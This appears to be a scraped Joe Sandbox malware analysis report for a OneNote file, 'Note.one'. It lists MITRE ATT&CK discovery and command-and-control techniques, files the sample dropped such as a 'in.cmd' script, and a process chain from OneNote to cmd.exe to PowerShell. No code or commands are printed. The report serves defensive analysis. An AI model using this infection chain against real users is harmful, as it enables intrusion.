Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Note.one

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\in.cmd

C:\Users\user\AppData\Local\Microsoft\OneNote\14.0\OneNoteOfflineCache.onecache

C:\Users\user\AppData\Local\Temp\OneNote_MigrationLog.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15M3XZRS569XGGKUX6EK.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5f4367.TMP (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RCSEMY5PNCKXDGZ3FK2J.temp

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Statistics

Behavior

System Behavior

Analysis Process: ONENOTE.EXEPID: 2928, Parent PID: 1860

General

Analysis Process: cmd.exePID: 1116, Parent PID: 1860

General

Analysis Process: powershell.exePID: 1932, Parent PID: 1116

General

Windows Analysis Report
Note.one